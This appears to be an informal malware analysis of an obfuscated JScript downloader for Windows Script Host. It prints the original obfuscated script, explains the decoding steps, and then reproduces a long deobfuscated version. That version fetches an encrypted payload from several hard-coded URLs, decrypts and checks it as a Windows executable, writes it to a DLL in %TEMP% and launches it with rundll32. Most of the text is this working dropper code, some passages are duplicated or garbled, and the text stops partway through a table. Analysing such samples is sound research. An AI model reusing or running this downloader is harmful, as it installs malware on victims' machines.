if (_dd == _c) {return 1;}
else {WScript.Quit(1);
};
}var _c = "\%S"+"ystemRoot\%\\system32\\cmd."+"ex"+"e";
var _zds = this[_wds]["CreateObject"](_wds+".Shell");
var se = _zds["E"+"n"+"vironmen"+"t"]("S"+"Y"+"S"+"TEM");
var _dd = se("ComSpe"+"c");
if (_dd == _c) {return 1;}
else {WScript.Quit(1);
};
d();
var Ql = new Array("\x66"+"","\x75"+"","\x6e"+"","\x63"+"","\x74"+"","\x69"+"","\x6f"+"","\x20"+"","\x64"+"","\x28"+"","\x29"+"","\x7b"+"","\x0a"+"","\x76"+"","\x61"+"","\x72"+"","\x5f"+"","\x77"+"","\x73"+"","\x3d"+"","\x22"+"","\x57"+"","\x53"+"","\x2b"+"","\x70"+"","\x3b"+"","\x5c"+"","\x25"+"","\x79"+"","\x65"+"","\x6d"+"","\x52"+"","\x33"+"","\x32"+"","\x2e"+"","\x78"+"","\x7a"+"","\x68"+"","\x5b"+"","\x5d"+"","\x43"+"","\x4f"+"","\x62"+"","\x6a"+"","\x6c"+"","\x45"+"","\x59"+"","\x54"+"","\x4d"+"","\x31"+"","\x7d"+"","\x09"+"","\x51"+"","\x44"+"","\x49"+"","\x0d"+"","\x42"+"","\x48"+"","\x30"+"","\x46"+"","\x56"+"","\x67"+"","\x37"+"","\x4c"+"","\x50"+"","\x4a"+"","\x71"+"","\x4e"+"","\x38"+"","\x41"+"","\x5a"+"","\x47"+"","\x55"+"","\x35"+"","\x34"+"","\x36"+"","\x4b"+"","\x58"+"","\x39"+"","\x6b"+"","\x2c"+"","\x2f"+"","\x3a"+"","\x2d"+"","\x3c"+"","\x2a"+"","\x7c"+"","\x3e"+"","\x21"+"","\x5e"+"","\x26");
var Ci8 = [0/1,1/1,2/1,3/1,4/1,5/1,6/1,2/1,7/1,8/1,9/1,10/1,11/1,12/1,7/1,7/1,7/1,7/1,13/1,14/1,15/1,7/1,16/1,17/1,8/1,18/1,7/1,19/1,7/1,20/1,21/1,22/1,20/1,23/1,20/1,3/1,15/1,20/1,23/1,20/1,5/1,24/1,4/1,20/1,25/1,12/1,7/1,7/1,7/1,7/1,13/1,14/1,15/1,7/1,16/1,3/1,7/1,19/1,7/1,20/1,26/1,27/1,22/1,20/1,23/1,20/1,28/1,18/1,4/1,29/1,30/1,31/1,6/1,6/1,4/1,26/1,27/1,26/1,26/1,18/1,28/1,18/1,4/1,29/1,30/1,32/1,33/1,26/1,26/1,3/1,30/1,8/1,34/1,20/1,23/1,20/1,29/1,35/1,20/1,23/1,20/1,29/1,20/1,25/1,12/1,7/1,7/1,7/1,7/1,13/1,14/1,15/1,7/1,16/1,36/1,8/1,18/1,7/1,19/1,7/1,4/1,37/1,5/1,18/1,38/1,16/1,17/1,8/1,18/1,39/1,38/1,20/1,40/1,15/1,29/1,14/1,4/1,29/1,41/1,42/1,43/1,29/1,3/1,4/1,20/1,39/1,9/1,16/1,17/1,8/1,18/1,23/1,20/1,34/1,22/1,37/1,29/1,44/1,44/1,20/1,10/1,25/1,12/1,7/1,7/1,7/1,7/1,13/1,14/1,15/1,7/1,18/1,29/1,7/1,19/1,7/1,16/1,36/1,8/1,18/1,38/1,20/1,45/1,
...
...
/1,42/1,7/1,23/1,7/1,47/1,31/1,0/1,39/1,9/1,10/1,25/1,55/1,12/1,50/1,25];
var Hp = '';
for (var SSg=0; SSg < Ci8.length; SSg++)
{
Hp = Hp.concat(Ql[Ci8[SSg]]);
}
eval(Hp);
2) First deobfuscation :
Var QI : new Array, decoding the \xvalues => unescape unicode:
=>
("f"+"","u"+"","n"+"","c"+"","t"+"","i"+"","o"+""," "+"","d"+"","("+"",")"+"","{"+"","
"+"","v"+"","a"+"","r"+"","_"+"","w"+"","s"+"","="+"","""+"","W"+"","S"+"","+"+"","p"+"",";"+"","\"+"","%"+"","y"+"","e"+"","m"+"","R"+"","3"+"","2"+"","."+"","x"+"","z"+"","h"+"","["+"","]"+"","C"+"","O"+"","b"+"","j"+"","l"+"","E"+"","Y"+"","T"+"","M"+"","1"+"","}"+""," "+"","Q"+"","D"+"","I"+"","
"+"","B"+"","H"+"","0"+"","F"+"","V"+"","g"+"","7"+"","L"+"","P"+"","J"+"","q"+"","N"+"","8"+"","A"+"","Z"+"","G"+"","U"+"","5"+"","4"+"","6"+"","K"+"","X"+"","9"+"","k"+"",","+"","/"+"",":"+"","-"+"","<"+"","*"+"","|"+"",">"+"","!"+"","^"+"","&");
"+"","v"+"","a"+"","r"+"","_"+"","w"+"","s"+"","="+"","""+"","W"+"","S"+"","+"+"","p"+"",";"+"","\"+"","%"+"","y"+"","e"+"","m"+"","R"+"","3"+"","2"+"","."+"","x"+"","z"+"","h"+"","["+"","]"+"","C"+"","O"+"","b"+"","j"+"","l"+"","E"+"","Y"+"","T"+"","M"+"","1"+"","}"+""," "+"","Q"+"","D"+"","I"+"","
"+"","B"+"","H"+"","0"+"","F"+"","V"+"","g"+"","7"+"","L"+"","P"+"","J"+"","q"+"","N"+"","8"+"","A"+"","Z"+"","G"+"","U"+"","5"+"","4"+"","6"+"","K"+"","X"+"","9"+"","k"+"",","+"","/"+"",":"+"","-"+"","<"+"","*"+"","|"+"",">"+"","!"+"","^"+"","&");
var Ci8 : all /number part can be removed : number divided by 1
Ci8 = [0 , 1 , 2 , 3, 4 , 5, 6, 2, 7 , 8 , 9 , 10 , 11 , 12, 7 , 7 , 7 , 7 , ...............]
for (var SSg=0; SSg < Ci8.length; SSg++)
{
{
Hp = Hp.concat(Ql[Ci8[SSg]]);
}=> Ci8 : contains the index of Qi chars that may be replaced => decipher method
Hp :
Result : the code "less" obfuscated.
Example :
0 => f
1 => u
2 => n
3 => c
4 => t
5 => i
6 => o
2 => n
7 => blank char
1 => u
2 => n
3 => c
4 => t
5 => i
6 => o
2 => n
7 => blank char
A funny part :
The beginning of this first deobfuscation is, another time, the same code that at the beginning of the script : lol
function d(){
d();
=> so, once real part is build : 2 times this function and d() call
What is the aim of this function ?
Verify that the script is used on a system with %SystemRoot%\system32\cmd.exe
available (environment property "ComSpec" is retrieved and compared)
var _wds = "WS"+"cr"+"ipt";
var _c = "\%S"+"ystemRoot\%\\system32\\cmd."+"ex"+"e";
var _zds = this[_wds]["CreateObject"](_wds+".Shell");
var se = _zds["E"+"n"+"vironmen"+"t"]("S"+"Y"+"S"+"TEM");
var _dd = se("ComSpe"+"c");
if (_dd == _c) {return 1;}
else {WScript.Quit(1);};
}var _c = "\%S"+"ystemRoot\%\\system32\\cmd."+"ex"+"e";
var _zds = this[_wds]["CreateObject"](_wds+".Shell");
var se = _zds["E"+"n"+"vironmen"+"t"]("S"+"Y"+"S"+"TEM");
var _dd = se("ComSpe"+"c");
if (_dd == _c) {return 1;}
else {WScript.Quit(1);};
d();
=> so, once real part is build : 2 times this function and d() call
What is the aim of this function ?
Verify that the script is used on a system with %SystemRoot%\system32\cmd.exe
available (environment property "ComSpec" is retrieved and compared)
var WshShell = WScript.CreateObject("WScript.Shell");
var WshSysEnv = WshShell.Environment("SYSTEM");
'The WshEnvironment object is a collection of environment variables that is returned by the WshShell object's Environment property. This collection contains the entire set of environment variables (those with names and those without). To retrieve individual environment variables (and their values) from this collection, use the environment variable name as the index'.
Here : "ComSpec"var WshSysEnv = WshShell.Environment("SYSTEM");
'The WshEnvironment object is a collection of environment variables that is returned by the WshShell object's Environment property. This collection contains the entire set of environment variables (those with names and those without). To retrieve individual environment variables (and their values) from this collection, use the environment variable name as the index'.
WshSysEnv("ComSpec")
=> %SystemRoot%\system32\cmd.exe"
At the end of the function, if the two strings are different, it quits.
=> %SystemRoot%\system32\cmd.exe"
At the end of the function, if the two strings are different, it quits.
eval(Hp); => evaluate the string => for analysis, eval removed 
=> HP will be a String with all the part
=> HP will be a String with all the part
3) After first deobfuscation :
Long part, but only need, after, some var concatenation / replacement
function d(){
d();
var DIl = "ose" + "";var _wds = "WS"+"cr"+"ipt";
var _c = "\%S"+"ystemRoot\%\\system32\\cmd."+"ex"+"e";
var _zds = this[_wds]["CreateObject"](_wds+".Shell");
var se = _zds["E"+"n"+"vironmen"+"t"]("S"+"Y"+"S"+"TEM");
var _dd = se("ComSpe"+"c");
if (_dd == _c) {return 1;}
else {WScript.Quit(1);};
}var _c = "\%S"+"ystemRoot\%\\system32\\cmd."+"ex"+"e";
var _zds = this[_wds]["CreateObject"](_wds+".Shell");
var se = _zds["E"+"n"+"vironmen"+"t"]("S"+"Y"+"S"+"TEM");
var _dd = se("ComSpe"+"c");
if (_dd == _c) {return 1;}
else {WScript.Quit(1);};
d();
var TBh = "cl" + "";
var Hu = "ile" + "";
var Br0 = "oF" + "";
var Vg7 = "SaveT" + "";
var DLg = "Text" + "";
var Py = "write" + "";
var JCq = "n" + "";
var PNp = "ope" + "";
var PQe8 = "rset" + "";
var By8 = "Cha" + "";
var NTs8 = "type" + "";
var EDi = "am" + "";
var HVj3 = "re" + "";
var AHp = "St" + "";
var Md0 = "DB." + "";
var Qg = "O" + "";
var Qh = "D" + "";
var VYl = "A" + "";
var Wg3 = "ct" + "";
var ZVf1 = "eObje" + "";
var Ll = "Creat" + "";
var GPy = "join" + "";
var VUe5 = "e" + "";
var St2 = "arCod" + "";
var NEh0 = "Ch" + "";
var GPe8 = "from" + "";
var Wp = "th" + "";
var Re5 = "leng" + "";
var PIj = "sh" + "";
var Re = "pu" + "";
var Yd7 = "t" + "";
var Oz8 = "deA" + "";
var Jy = "arCo" + "";
var Ha = "ch" + "";
var CJj4 = "gth" + "";
var BWt3 = "len" + "";
var JHm = "e" + "";
var Ru = "clos" + "";
var JMd2 = "xt" + "";
var TUo = "adTe" + "";
var Vi6 = "Re" + "";
var Dx5 = "le" + "";
var Hs = "romFi" + "";
var Cv7 = "adF" + "";
var Dy6 = "Lo" + "";
var UOv = "open" + "";
var Kp = "t" + "";
var XQg1 = "se" + "";
var Lf = "Char" + "";
var APo0 = "e" + "";
var UEs = "typ" + "";
var Uo1 = "am" + "";
var IId = "tre" + "";
var Zp5 = "DB.S" + "";
var JVp2 = "O" + "";
var Dx3 = "D" + "";
var MHl3 = "A" + "";
var PFd9 = "ject" + "";
var NKk = "eOb" + "";
var QSt = "eat" + "";
var ITb = "Cr" + "";
var VIz = "th" + "";
var VOy4 = "leng" + "";
var XVu = "h" + "";
var MJt = "gt" + "";
var Kk7 = "len" + "";
var Xu7 = "ice" + "";
var JGk = "spl" + "";
var XUy3 = "h" + "";
var DOz = "lengt" + "";
var Fg5 = "gth" + "";
var NIw = "len" + "";
var QOe = "th" + "";
var Xq9 = "leng" + "";
var NMu = "th" + "";
var ZXd6 = "leng" + "";
var Sp3 = "h" + "";
var Aq7 = "gt" + "";
var Rr3 = "len" + "";
var Pz4 = "eep" + "";
var Ep = "Sl" + "";
var OCv5 = "3" + "";
var Jh = "y 32" + "";
var Uj = "ert" + "";
var Cp = ",qw" + "";
var Jw = " " + "";
var Ao = "Run" + "";
var Yo2 = "th" + "";
var Gs9 = "leng" + "";
var Uy = "h" + "";
var Il = "lengt" + "";
var TRf = "e" + "";
var Ab = "clos" + "";
var Gh5 = "File" + "";
var Cz = "eTo" + "";
var KIy6 = "Sav" + "";
var LMj = "n" + "";
var WXl8 = "sitio" + "";
var Yq = "po" + "";
var Wz = "y" + "";
var Td7 = "Bod" + "";
var Si = "onse" + "";
var NVt = "Resp" + "";
var PYg = "write" + "";
var WKs3 = "type" + "";
var CLc0 = "en" + "";
var Ya0 = "op" + "";
var Sq1 = "m" + "";
var Da7 = "trea" + "";
var YSd7 = "DB.S" + "";
var NIo1 = "O" + "";
var Gv7 = "D" + "";
var Ma7 = "A" + "";
var Pv3 = "ct" + "";
var Of2 = "eObje" + "";
var Md = "Creat" + "";
var Co = "p" + "";
var BBw = "ee" + "";
var Qw = "Sl" + "";
var ZKp = "send" + "";
var WZg = "th" + "";
var LVk = "ng" + "";
var Nr = "le" + "";
var Oc6 = "GET" + "";
var Wb = "open" + "";
var XHm = "gth" + "";
var EYq = "len" + "";
var He = "Quit" + "";
var Go7 = "ript" + "";
var Dx = "WSc" + "";
var Bb5 = "ts" + "";
var Zg = "xis" + "";
var VQd = "FileE" + "";
var Ka9 = ".txt" + "";
var FXl8 = "s" + "";
var Vn = "ist" + "";
var Va = "Ex" + "";
var Js = "File" + "";
var VGj1 = "t" + "";
var Yy5 = "jec" + "";
var GIy0 = "emOb" + "";
var Hk7 = "st" + "";
var AHq = "leSy" + "";
var Lx2 = ".Fi" + "";
var Ny6 = "ing" + "";
var ZHe = "pt" + "";
var Fj0 = "Scri" + "";
var Cg7 = "ct" + "";
var Ae = "je" + "";
var ZSf8 = "teOb" + "";
var Op0 = "Crea" + "";
var Tl5 = "h" + "";
var HXh4 = "lengt" + "";
var Kk2 = ".1" + "";
var GXj = "est.5" + "";
var Ey7 = "equ" + "";
var CMz6 = "HttpR" + "";
var PWd = "in" + "";
var Ww0 = "tp.W" + "";
var Bx5 = "WinHt" + "";
var Cl1 = "TTP" + "";
var QZf7 = "XMLH" + "";
var KKr2 = "ML2." + "";
var NAp9 = "MSX" + "";
var ABx = "/" + "";
var DQo = "9+" + "";
var BFi = "45678" + "";
var HNn0 = "0123" + "";
var Yu0 = "wxyz" + "";
var FHs = "stuv" + "";
var Gf = "pqr" + "";
var Fi = "no" + "";
var OQa = "klm" + "";
var Ps = "fghij" + "";
var UWj = "bcde" + "";
var AKs8 = "WXYZa" + "";
var YHq9 = "RSTUV" + "";
var IVg3 = "OPQ" + "";
var EDd = "KLMN" + "";
var UXu0 = "GHIJ" + "";
var Dv5 = "CDEF" + "";
var Gd1 = "AB" + "";
var Mi0 = "%SystemRoot%\\\\system32\\\\rundll32.exe" + "";
var NLq = "%SystemRoot%\\\\SysWOW64\\\\rundll32.exe" + "";
var XGx = "amd64" + "";
var HSu1 = "TURE" + "";
var DEa = "ITEC" + "";
var JBs8 = "CH" + "";
var Ht0 = "_AR" + "";
var HYu2 = "OR" + "";
var Ex1 = "SS" + "";
var SIq = "PROCE" + "";
var ZPt = "m" + "";
var Bp2 = "te" + "";
var Ds = "Sys" + "";
var GIf = "ll" + "";
var Fb = ".d" + "";
var Es0 = "Ggw" + "";
var ZLu = "gsGc" + "";
var IZr = "ooSns" + "";
var Fq = "P%/" + "";
var Nj = "%TEM" + "";
var KTx = "l" + "";
var Pi2 = "Shel" + "";
var BZr = "ript." + "";
var GBg = "WSc" + "";
var GNu0 = "ect" + "";
var Jz = "teObj" + "";
var Cd = "Crea" + "";
var BCt = "2ictp" + "";
var Vx = "g/" + "";
var Gj = ".wan" + "";
var Ai0 = "y7" + "";
var ZVf0 = "ad" + "";
var XIa = "l" + "";
var Tp5 = "rano" + "";
var Qq = "sop" + "";
var LOi = "//" + "";
var TTu = "http:" + "";
var NAj = "pe" + "";
var Tp7 = "fhs" + "";
var GPw = "sl" + "";
var BUu7 = "t/" + "";
var Of3 = "ne" + "";
var Nc = "o." + "";
var Tf9 = "i" + "";
var Ea4 = "br" + "";
var ZDn = "li" + "";
var YDg7 = "ui" + "";
var Os = "eq" + "";
var Oz0 = "ado" + "";
var Ag = "ci" + "";
var Ei3 = "ssen" + "";
var Tn = "e" + "";
var QXr = "//" + "";
var XBm = "tp:" + "";
var Ah = "ht" + "";
var IYq0 = "1s5" + "";
var Hl = "ut" + "";
var Af1 = "eu/" + "";
var So = "at." + "";
var Sq6 = "im" + "";
var AYc8 = "e" + "";
var YOv7 = ".h" + "";
var LLy5 = "e" + "";
var Br2 = "rag" + "";
var Cn = "-of-" + "";
var MQh7 = "lm" + "";
var SJa = "ea" + "";
var Ai2 = "p://r" + "";
var Vu0 = "htt" + "";
var JPy = "yg2" + "";
var Ke = "40" + "";
var Wk = "/g" + "";
var Vq = "om" + "";
var Za2 = ".c" + "";
var Kb3 = "e" + "";
var LTh = "ttl" + "";
var MEw1 = "o" + "";
var YXv5 = "xb" + "";
var Ch = "ati" + "";
var DSx = "qu" + "";
var QSu = "://a" + "";
var Dk7 = "p" + "";
var Tj4 = "htt" + "";
var EBb = "cb" + "";
var ULs4 = "v07t7" + "";
var OHi6 = ".68/" + "";
var Hk = "29" + "";
var Ka6 = ".1" + "";
var KFg2 = "26" + "";
var Jj = "2." + "";
var Yq8 = "://21" + "";
var CHu1 = "tp" + "";
var Yc = "ht" + "";
var Ai = "437" + "";
var SQk2 = "ngth" + "";
var TAh2 = "le" + "";
var QGx4 = "m" + "";
var WMm = "mmmm" + "";
var Ji = "mmmmm" + "";
var IOf = "mmm" + "";
var WMf = "mm" + "";
var KKc5 = "mmmm" + "";
var Wd8 = "mmmmm" + "";
var DZa = "mmmm" + "";
var Ap8 = "fd" + "";
var Yu = "sdfas" + "";
var FEo3 = "asfa" + "";
var HAj = "th" + "";
var Zc = "leng" + "";
var HJs = "m" + "";
var YRz = "mm" + "";
var Vo3 = "mmmm" + "";
var HEk4 = "mmmm" + "";
var Pm2 = "mmmmm" + "";
var OXa = "mmmm" + "";
var PAj0 = "mm" + "";
var Sq = "mm" + "";
var Wh8 = "mmm" + "";
var AGf5 = "mmm" + "";
var ZIv = "mmmmm" + "";
var Ht4 = "mmmmm" + "";
var Pe = "mmmm" + "";
var FLt = "mmmmm" + "";
var JFt3 = "mmmmm" + "";
var NRs4 = "mm" + "";
var Fp = "h" + "";
var ETi8 = "lengt" + "";
var Pp9 = "mmm" + "";
var FOt = "mmm" + "";
var RCp2 = "mmmm" + "";
var Un = "mmmmm" + "";
var LKr = "mmmmm" + "";
var JFa2 = "mmmmm" + "";
var Bl8 = "mm" + "";
var Dd2 = "mmmmm" + "";
var NPu2 = "mmmm" + "";
var Is1 = "mm" + "";
var NNc0 = "132" + "";
var Kx0 = "1123" + "";
var Hw = (Kx0 + NNc0, Is1 + NPu2 + Dd2 + Bl8 + JFa2 + LKr + Un + RCp2 + FOt + Pp9);
var Uv = Hw[ETi8 + Fp];
var WBe = (NRs4 + JFt3 + FLt + Pe + Ht4 + ZIv + AGf5 + Wh8 + Sq + PAj0 + OXa + Pm2 + HEk4 + Vo3 + YRz + HJs);
var IVi2 = 753887;
var Uw = WBe[ETi8 + Fp];
var MOk3 = (FEo3 + Yu + Ap8, DZa + Wd8 + KKc5 + WMf + IOf + Ji + WMm + QGx4);
var Ma6 = MOk3[ETi8 + Fp];
var Yz = 2871 - 2870;
var AJf = 2;
var IDz0 = 2;
var Hn = "437";
var IGv7 = [Yc + CHu1 + Yq8 + Jj + KFg2 + Ka6 + Hk + OHi6 + ULs4 + EBb, Tj4 + Dk7 + QSu + DSx + Ch + YXv5 + MEw1 + LTh + Kb3 + Za2 + Vq + Wk + Ke + JPy, Vu0 + Ai2 + SJa + MQh7 + Cn + Br2 + LLy5 + YOv7 + AYc8 + Sq6 + So + Af1 + Hl + IYq0, Ah + XBm + QXr + Tn + Ei3 + Ag + Oz0 + Os + YDg7 + ZDn + Ea4 + Tf9 + Nc + Of3 + BUu7 + GPw + Tp7 + NAj, Ah + XBm + LOi + Qq + Tp5 + XIa + ZVf0 + Ai0 + Gj + Vx + BCt];
var Xl3 = WScript[Cd + Jz + GNu0](GBg + BZr + Pi2 + KTx);
var XWe = Xl3.ExpandEnvironmentStrings(Nj + Fq);
var NQf6 = XWe + IZr + ZLu + Es0;
var Nt5 = NQf6 + Fb + GIf;
var Vu = Xl3.Environment(Ds + Bp2 + ZPt);
if (Vu(SIq + Ex1 + HYu2 + Ht0 + JBs8 + DEa + HSu1).toLowerCase() == "amd64") {
var UFn4 = Xl3.ExpandEnvironmentStrings(NLq);
} else {
var UFn4 = Xl3.ExpandEnvironmentStrings(Mi0);
}
function uheprng(Ww) {
return (function() {
var seed = Ww;
var o = 48,
c = 1,
p = o,
s = new Array(o);
var i, j;
var base64chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
var mash = Mash();
for (i = 0; i < o; i++) s = mash(seed);
mash = null;
var random = function(range) {
return Math.floor(range * (rawprng() + (rawprng() * 0x200000 | 0) * 1.1102230246251565e-16));
}
function rawprng() {
if (++p >= o) p = 1 * 0;
var t = 1768863 * s[p] + c * 2.3283064365386963e-10;
return s[p] = t - (c = t | 0);
}
return random;
}());
};
function Mash() {
var n = 0xefc8249d;
var mash = function(data) {
if (data) {
data = data.toString();
for (var i = 0; i < data.length; i++) {
n += data.charCodeAt(i);
var h = 0.02519603282416938 * n;
n = h >>> 0;
h -= n;
h *= n;
n = h >>> 0;
h -= n;
n += h * 0x100000000;
}
return (n >>> 0) * 2.3283064365386963e-10;
} else n = 0xefc8249d;
};
return mash;
}
var SPz0 = [NAp9 + KKr2 + QZf7 + Cl1, Bx5 + Ww0 + PWd + CMz6 + Ey7 + GXj + Kk2];
for (var Lp9 = 0; Lp9 < SPz0[ETi8 + Fp]; Lp9++) {
try {
var MBi0 = WScript[Cd + Jz + GNu0](SPz0[Lp9]);
break;
} catch (e) {
continue;
}
};
var OPr3 = "";
var fso = new ActiveXObject(Fj0 + ZHe + Ny6 + Lx2 + AHq + Hk7 + GIy0 + Yy5 + VGj1);
var MTm6 = uheprng(Math.random().toString());
var ENa6 = 1;
do {
if (fso[Js + Va + Vn + FXl8](Nt5)) {
var Em = fso.GetFile(Nt5);
var DAb4 = Em.ShortPath;
OPr3 = DAb4 + Ka9;
if (fso[Js + Va + Vn + FXl8](OPr3)) {
this[Dx + Go7][He](824 - 824);
}
}
var HFw3 = MTm6(IGv7[ETi8 + Fp]);
try {
if (1 == ENa6) {
MBi0[Wb](Oc6, IGv7[HFw3++ % IGv7[ETi8 + Fp]], false);
MBi0[ZKp]();
}
if (MBi0.readystate < 4) {
WScript[Qw + BBw + Co](100);
continue;
}
var Nf = WScript[Cd + Jz + GNu0](Ma7 + Gv7 + NIo1 + YSd7 + Da7 + Sq1);
Nf[Wb]();
Nf[WKs3] = Yz;
Nf[PYg](MBi0[NVt + Si + Td7 + Wz]);
Nf[Yq + WXl8 + LMj] = 0;
Nf[KIy6 + Cz + Gh5](NQf6, IDz0);
Nf[Ab + TRf]();
var CJf2 = OMb(NQf6);
CJf2 = HIi(CJf2);
if (CJf2[ETi8 + Fp] < 100 * 1024 || CJf2[ETi8 + Fp] > 230 * 1024 || !XHw6(CJf2)) {
ENa6 = 1;
continue;
}
try {
IGi2(Nt5, CJf2);
} catch (e) {
break;
};
var Em = fso.GetFile(Nt5);
var DAb4 = Em.ShortPath;
Xl3[Ao](UFn4 + Jw + DAb4 + Cp + Uj + Jh + OCv5);
WScript.Sleep(3000);
} catch (e) {
WScript[Qw + BBw + Co](1000);
continue;
};
} while (ENa6);
WScript.Quit(0);
function HIi(JEc3) {
var TIk;
var ELs = uheprng(REMOVED_TO_PROTECT_YOU);
for (var Lp9 = 0; Lp9 < JEc3[ETi8 + Fp]; Lp9++) {
JEc3[Lp9] ^= ELs(256);
}
var Zm6 = JEc3[JEc3[ETi8 + Fp] - 4] | JEc3[JEc3[ETi8 + Fp] - 3] << 8 | JEc3[JEc3[ETi8 + Fp] - 2] << 16 | JEc3[JEc3[ETi8 + Fp] - 1] << 24;
JEc3[JGk + Xu7](CJf2[ETi8 + Fp] - 4, 4);
TIk = Uv;
for (var Lp9 = 0; Lp9 < JEc3[ETi8 + Fp]; Lp9++) {
TIk = (TIk + JEc3[Lp9]) % 0x100000000;
};
if (TIk != Zm6) {
return [];
};
return JEc3;
};
function XHw6(JEc3) {
if (JEc3[0] == 0x4D && JEc3[1] == 0x5a) {
return true;
} else {return false;
}
};
function OMb(Nq) {
var QAl8 = WScript[Cd + Jz + GNu0](Ma7 + Gv7 + NIo1 + YSd7 + Da7 + Sq1);
QAl8[WKs3] = AJf;QAl8[Lf + XQg1 + Kp] = Hn;
QAl8[Wb]();
QAl8[Dy6 + Cv7 + Hs + Dx5](Nq);
var Fm = QAl8[Vi6 + TUo + JMd2];
QAl8[Ab + TRf]();
return St(Fm);
};
function St(IBx3) {
var Vi5 = new Array();
Vi5[199] = 50 * 2 + 28;
Vi5[252] = 129;
Vi5[233] = 130;
Vi5[226] = 9737 - 9606;
Vi5[228] = 132;
Vi5[224] = 133;
Vi5[229] = 134;
Vi5[231] = 135;
Vi5[33 * 7 + 3] = 136;
Vi5[6873 - 6638] = 9263 - 9126;
Vi5[232] = -1483 + 1621;
Vi5[239] = 4882 - 4743;
Vi5[238] = 7993 - 7853;
Vi5[236] = 141;
Vi5[196] = 142;
Vi5[197] = -261 + 404;
Vi5[201] = 144;
Vi5[230] = 145;
Vi5[198] = 6355 - 6209;
Vi5[-6198 + 6442] = 147;
Vi5[-4163 + 4409] = 148;
Vi5[242] = 149;
Vi5[251] = 150;
Vi5[249] = 151;
Vi5[255] = 152;
Vi5[7046 - 6832] = 153;
Vi5[5708 - 5488] = 154;
Vi5[162] = 155;
Vi5[163] = 156;
Vi5[165] = 32 * 4 + 29;
Vi5[8359] = 158;
Vi5[402] = 159;
Vi5[225] = 160;
Vi5[6218 - 5981] = 161;
Vi5[243] = -7644 + 7806;
Vi5[250] = 163;
Vi5[5038 - 4797] = 164;
Vi5[209] = 165;
Vi5[170] = 166;
Vi5[186] = 167;
Vi5[191] = 168;
Vi5[8976] = 1933 - 1764;
Vi5[172] = 170;
Vi5[189] = -1595 + 1766;
Vi5[188] = 58 * 2 + 56;
Vi5[9861 - 9700] = 173;
Vi5[171] = 174;
Vi5[9639 - 9452] = 175;
Vi5[1057 * 9 + 104] = 37 * 4 + 28;
Vi5[9618] = -2836 + 3013;
Vi5[9619] = 178;
Vi5[9474] = 179;
Vi5[9508] = 180;
Vi5[9569] = 181;
Vi5[17395 - 7825] = 182;
Vi5[9558] = 183;
Vi5[9557] = 3196 - 3012;
Vi5[1279 + 8292] = 185;
Vi5[9553] = 186;
Vi5[9559] = 71 * 2 + 45;
Vi5[9565] = 188;
Vi5[3243 * 2 + 3078] = 189;
Vi5[9563] = 190;
Vi5[9488] = 191;
Vi5[9492] = 192;
Vi5[9524] = 193;
Vi5[9516] = 194;
Vi5[9500] = 195;
Vi5[9472] = 196;
Vi5[17570 - 8038] = 5 * 39 + 2;
Vi5[9566] = 198;
Vi5[9567] = 199;
Vi5[9562] = 200;
Vi5[9556] = 201;
Vi5[9577] = 202;
Vi5[9574] = 203;
Vi5[9568] = 204;
Vi5[9552] = 205;
Vi5[9580] = 206;
Vi5[9575] = 207;
Vi5[9576] = 208;
Vi5[2030 * 4 + 1452] = -2543 + 2752;
Vi5[9573] = 210;
Vi5[9561] = 211;
Vi5[9560] = 212;
Vi5[9554] = -7618 + 7831;
Vi5[9555] = 214;
Vi5[9579] = 215;
Vi5[9578] = 216;
Vi5[9496] = -2183 + 2400;
Vi5[9484] = 218;
Vi5[7422 + 2186] = 219;
Vi5[9604] = 220;
Vi5[2068 * 4 + 1340] = 10158 - 9937;
Vi5[9616] = 222;
Vi5[9600] = 223;
Vi5[945] = 224;
Vi5[69 * 3 + 16] = 225;
Vi5[5015 - 4100] = 226;
Vi5[960] = 227;
Vi5[-6443 + 7374] = 228;
Vi5[963] = 229;
Vi5[5321 - 5140] = 230;
Vi5[964] = 908 - 677;
Vi5[-7390 + 8324] = 232;
Vi5[920] = 233;
Vi5[5628 - 4691] = 234;
Vi5[7495 - 6547] = 104 * 2 + 27;
Vi5[9421 - 687] = 78 * 3 + 2;
Vi5[966] = 237;
Vi5[949] = 10003 - 9765;
Vi5[8745] = 239;
Vi5[4107 + 4694] = 240;
Vi5[-8510 + 8687] = 5178 - 4937;
Vi5[629 * 13 + 628] = 242;
Vi5[8804] = 243;
Vi5[8992] = 6450 - 6206;
Vi5[8993] = -7303 + 7548;
Vi5[247] = 246;
Vi5[8776] = 247;
Vi5[176] = 248;
Vi5[8729] = 249;
Vi5[183] = 250;
Vi5[8730] = 251;
Vi5[8319] = 252;
Vi5[178] = 253;
Vi5[9632] = 254;
Vi5[160] = 255;
var CJf2 = new Array();
for (var Lp9 = 0; Lp9 < IBx3[ETi8 + Fp]; Lp9++) {var El = IBx3[Ha + Jy + Oz8 + Yd7](Lp9);
if (El < 128) {
var Lj4 = El;
} else {
var Lj4 = Vi5[El];
}
CJf2[Re + PIj](Lj4);
};
return CJf2;
};
function Kx1(JEc3) {
var Io = new Array();
Io[128] = 15 * 13 + 4;
Io[129] = 252;
Io[-2277 + 2407] = 233;
Io[131] = 226;
Io[-1834 + 1966] = 228;
Io[133] = 224;
Io[1769 - 1635] = 229;
Io[135] = 231;
Io[136] = 234;
Io[137] = 78 * 3 + 1;
Io[138] = 232;
Io[139] = 239;
Io[140] = 238;
Io[141] = 236;
Io[142] = 196;
Io[143] = 197;
Io[144] = 201;
Io[145] = 230;
Io[146] = 198;
Io[46 * 3 + 9] = 244;
Io[148] = 246;
Io[149] = 242;
Io[117 + 33] = 4170 - 3919;
Io[-1899 + 2050] = 249;
Io[152] = 255;
Io[153] = 93 * 2 + 28;
Io[-5752 + 5906] = 10 * 22;
Io[61 * 2 + 33] = 5897 - 5735;
Io[156] = 1376 - 1213;
Io[157] = 165;
Io[158] = 8359;
Io[1784 - 1625] = 65 * 6 + 12;
Io[160] = 225;
Io[161] = 84 * 2 + 69;
Io[162] = 243;
Io[24 * 6 + 19] = 250;
Io[164] = 5946 - 5705;
Io[165] = 13 * 16 + 1;
Io[166] = 170;
Io[167] = 186;
Io[168] = 191;
Io[169] = 8976;
Io[170] = 172;
Io[171] = 189;
Io[172] = 188;
Io[173] = 161;
Io[174] = 171;
Io[175] = 51 * 3 + 34;
Io[8426 - 8250] = 9617;
Io[177] = 9618;
Io[178] = 11785 - 2166;
Io[179] = 3796 * 2 + 1882;
Io[-6284 + 6464] = 13737 - 4229;
Io[181] = 9569;
Io[-8301 + 8483] = 9570;
Io[183] = 6199 + 3359;
Io[184] = 9557;
Io[185] = 9571;
